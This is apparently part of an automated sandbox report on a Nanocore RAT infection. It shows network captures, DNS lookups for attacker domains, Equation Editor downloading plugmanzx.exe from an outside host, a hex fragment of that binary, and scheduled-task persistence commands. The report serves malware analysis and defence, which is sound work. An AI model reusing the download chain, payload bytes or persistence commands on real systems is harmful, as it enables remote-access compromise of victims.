                                                Sep 14, 2021 13:16:21.760013103 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.760500908 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788477898 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788525105 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788557053 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788583040 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788589001 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788603067 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788606882 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788619041 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788650036 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788661003 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788667917 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788680077 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788701057 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788711071 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788743019 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788753986 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788758993 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788775921 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788806915 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788825989 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788832903 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788836956 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788867950 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788882971 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788887978 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788901091 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788916111 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788932085 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788963079 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.788981915 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788985968 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.788994074 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.789002895 CEST4916580192.168.2.22185.239.243.112
                                                Sep 14, 2021 13:16:21.789024115 CEST8049165185.239.243.112192.168.2.22
                                                Sep 14, 2021 13:16:21.789063931 CEST4916580192.168.2.22185.239.243.112

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 14, 2021 13:16:21.569555998 CEST4997253192.168.2.228.8.8.8
                                                Sep 14, 2021 13:16:21.654107094 CEST53499728.8.8.8192.168.2.22
                                                Sep 14, 2021 13:16:34.001727104 CEST5177153192.168.2.228.8.8.8
                                                Sep 14, 2021 13:16:34.038151026 CEST53517718.8.8.8192.168.2.22
                                                Sep 14, 2021 13:16:52.140332937 CEST5986753192.168.2.228.8.8.8
                                                Sep 14, 2021 13:16:52.173284054 CEST53598678.8.8.8192.168.2.22
                                                Sep 14, 2021 13:17:17.275789022 CEST5031553192.168.2.228.8.8.8
                                                Sep 14, 2021 13:17:17.311537981 CEST53503158.8.8.8192.168.2.22
                                                Sep 14, 2021 13:17:17.313028097 CEST5031553192.168.2.228.8.8.8
                                                Sep 14, 2021 13:17:17.348654985 CEST53503158.8.8.8192.168.2.22
                                                Sep 14, 2021 13:17:58.081119061 CEST5007253192.168.2.228.8.8.8
                                                Sep 14, 2021 13:17:58.118311882 CEST53500728.8.8.8192.168.2.22
                                                Sep 14, 2021 13:18:15.957704067 CEST5430453192.168.2.228.8.8.8
                                                Sep 14, 2021 13:18:15.990187883 CEST53543048.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Sep 14, 2021 13:16:21.569555998 CEST192.168.2.228.8.8.80x9983Standard query (0)lg-tv.tkA (IP address)IN (0x0001)
                                                Sep 14, 2021 13:16:34.001727104 CEST192.168.2.228.8.8.80x3fc0Standard query (0)blackbladeinc52.ddns.netA (IP address)IN (0x0001)
                                                Sep 14, 2021 13:16:52.140332937 CEST192.168.2.228.8.8.80x501Standard query (0)blackbladeinc52.ddns.netA (IP address)IN (0x0001)
                                                Sep 14, 2021 13:17:17.275789022 CEST192.168.2.228.8.8.80x13f5Standard query (0)blackbladeinc52.ddns.netA (IP address)IN (0x0001)
                                                Sep 14, 2021 13:17:17.313028097 CEST192.168.2.228.8.8.80x13f5Standard query (0)blackbladeinc52.ddns.netA (IP address)IN (0x0001)
                                                Sep 14, 2021 13:17:58.081119061 CEST192.168.2.228.8.8.80x8113Standard query (0)blackbladeinc52.ddns.netA (IP address)IN (0x0001)
                                                Sep 14, 2021 13:18:15.957704067 CEST192.168.2.228.8.8.80x2190Standard query (0)blackbladeinc52.ddns.netA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Sep 14, 2021 13:16:21.654107094 CEST8.8.8.8192.168.2.220x9983No error (0)lg-tv.tk185.239.243.112A (IP address)IN (0x0001)
                                                Sep 14, 2021 13:16:34.038151026 CEST8.8.8.8192.168.2.220x3fc0No error (0)blackbladeinc52.ddns.net31.210.20.61A (IP address)IN (0x0001)
                                                Sep 14, 2021 13:16:52.173284054 CEST8.8.8.8192.168.2.220x501No error (0)blackbladeinc52.ddns.net31.210.20.61A (IP address)IN (0x0001)
                                                Sep 14, 2021 13:17:17.311537981 CEST8.8.8.8192.168.2.220x13f5No error (0)blackbladeinc52.ddns.net31.210.20.61A (IP address)IN (0x0001)
                                                Sep 14, 2021 13:17:17.348654985 CEST8.8.8.8192.168.2.220x13f5No error (0)blackbladeinc52.ddns.net31.210.20.61A (IP address)IN (0x0001)
                                                Sep 14, 2021 13:17:58.118311882 CEST8.8.8.8192.168.2.220x8113No error (0)blackbladeinc52.ddns.net31.210.20.61A (IP address)IN (0x0001)
                                                Sep 14, 2021 13:18:15.990187883 CEST8.8.8.8192.168.2.220x2190No error (0)blackbladeinc52.ddns.net31.210.20.61A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • lg-tv.tk

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.2249165185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampkBytes transferredDirectionData
                                                Sep 14, 2021 13:16:21.700583935 CEST0OUTGET /plugmanzx.exe HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: lg-tv.tk
                                                Connection: Keep-Alive
                                                Sep 14, 2021 13:16:21.730138063 CEST2INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Tue, 14 Sep 2021 11:16:21 GMT
                                                Content-Type: application/x-msdownload
                                                Content-Length: 530432
                                                Last-Modified: Tue, 14 Sep 2021 00:28:19 GMT
                                                Connection: keep-alive
                                                ETag: "613feca3-81800"
                                                Accept-Ranges: bytes
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 25 ea 3f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0e 08 00 00 08 00 00 00 00 00 00 62 2d 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 2d 08 00 4f 00 00 00 00 40 08 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 0d 08 00 00 20 00 00 00 0e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 40 08 00 00 06 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 16 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 2d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 64 00 00 a8 e3 01 00 03 00 00 00 32 00 00 06 48 48 02 00 c8 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 50 00 00 00 01 00 00 11 02 28 14 00 00 0a 00 00 02 1f 0a 1f 0a 73 15 00 00 0a 7d 01 00 00 04 16 0a 2b 2b 00 16 0b 2b 18 00 02 7b 01 00 00 04 06 07 73 16 00 00 0a 28 17 00 00 0a 00 07 17 58 0b 07 1f 0a fe 04 0c 08 2d df 00 06 17 58 0a 06 1f 0a fe 04 0d 09 2d cc 2a 13 30 01 00 0c 00 00 00 02 00 00 11 00 02 7b 01 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 01 00 00 04 2a 00 00 1b 30 04 00 a0 00 00 00 03 00 00 11 00 03 1f 09 30 0f 03 16 32 0b 04 1f 09 30 06 04 16 fe 04 2b 01 17 0a 06 2c 13 00 1f 0f 1f 0f 72 01 00 00 70 1f 0f 28 2e 00 00 06 00 00 02 28 02 00 00 06 03 04 28 18 00 00 0a 6f 19 00 00 0a 16 fe 03 0b 07 2c 15 00 1f 0f 1f 0f 72 3f 00 00 70 1f 0f 28 2e 00 00 06 00 00 2b 44 00 00 05 6f 1a 00 00 0a 0c 2b 1e 12 02 28 1b 00 00 0a 0d 00 02 28 02 00 00 06 03 04 28 18 00 00 0a 09 6f 1c 00 00 0a 00 00 12 02 28 1d 00 00 0a 2d d9 de 0f 12 02 fe 16 03 00 00 1b 6f 1e 00 00 0a 00 dc 00 2a 01 10 00 00 02 00 64 00 2b 8f 00 0f 00 00 00 00 13 30 03 00 22 01 00 00 04 00 00 11 00 7e 33 00 00 04 16 fe 01 0a 06 39 11 01 00 00 00 16 0b 7e 34 00 00 04 16 19 6f 1f 00 00 0a 0c 16 0d 2b 1f 00 16 13 04 2b 08 00 00 11 04 17 58 13 04 11 04 1f 0a fe 04 13 05 11 05 2d ec 00 09 17 58 0d 09 1f 0a fe 04 13 06 11 06 2d d6 07 2d 06 08 16 fe 01 2b 01 16 13 07 11 07 2c 34 00 16 13 08 2b 21 00 16 13 09 2b 08 00 00 11 09 17 58 13 09 11 09 1f 0a fe 04 13 0a 11 0a 2d ec 00 11 08 17 58 13 08 11 08 1f 0a fe 04 13 0b 11 0b 2d d3 00 07 2d 06 08 17 fe 01 2b 01 16 13 0c 11 0c 2c 34 00 16 13 0d 2b
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL%?a0b- @@ @-O@` H.textp `.rsrc@@@.reloc`@BD-Hd2HH0P(s}+++{s(X-X-*0{+*&}*0020+,rp(.((o,r?p(.+Do+(((o(-o*d+0"~39~4o++X-X--+,4+!+X-X--+,4+


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Start time:13:16:16
                                                Start date:14/09/2021
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                Imagebase:0x13f370000
                                                File size:1423704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:13:16:17
                                                Start date:14/09/2021
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                Imagebase:0x400000
                                                File size:543304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:13:16:18
                                                Start date:14/09/2021
                                                Path:C:\Users\user\AppData\Roaming\plugmangd5693.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\plugmangd5693.exe
                                                Imagebase:0x330000
                                                File size:530432 bytes
                                                MD5 hash:19665F929613C0E945FF13DD25C9362E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 39%, ReversingLabs
                                                Reputation:low

                                                General

                                                Start time:13:16:25
                                                Start date:14/09/2021
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'
                                                Imagebase:0xd10000
                                                File size:179712 bytes
                                                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:13:16:26
                                                Start date:14/09/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                Imagebase:0x1120000
                                                File size:32768 bytes
                                                MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:13:16:26
                                                Start date:14/09/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                Imagebase:0x1120000
                                                File size:32768 bytes
                                                MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, Author: Florian Roth
                                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, Author: Joe Security
                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, Author: Florian Roth
                                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, Author: Florian Roth
                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                Reputation:moderate

                                                General

                                                Start time:13:16:28
                                                Start date:14/09/2021
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp'
                                                Imagebase:0x380000
                                                File size:179712 bytes
                                                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:13:16:29
                                                Start date:14/09/2021
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp'
                                                Imagebase:0xf10000
                                                File size:179712 bytes
                                                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:13:16:29
                                                Start date:14/09/2021
                                                Path:C:\Windows\System32\taskeng.exe
                                                Wow64 process (32bit):false
                                                Commandline:taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                Imagebase:0xffdd0000
                                                File size:464384 bytes
                                                MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                General

                                                Start time:13:16:30
                                                Start date:14/09/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
                                                Imagebase:0x1120000
                                                File size:32768 bytes
                                                MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET

                                                General

                                                Start time:13:16:31
                                                Start date:14/09/2021
                                                Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
                                                Imagebase:0x11b0000
                                                File size:32768 bytes
                                                MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Antivirus matches:
                                                • Detection: 0%, Metadefender, Browse
                                                • Detection: 0%, ReversingLabs

                                                General

                                                Start time:13:16:39
                                                Start date:14/09/2021
                                                Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
                                                Imagebase:0x1b0000
                                                File size:32768 bytes
                                                MD5 hash:72A9F09010A89860456C6474E2E6D25C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET

                                                Disassembly

                                                Code Analysis

                                                Reset < >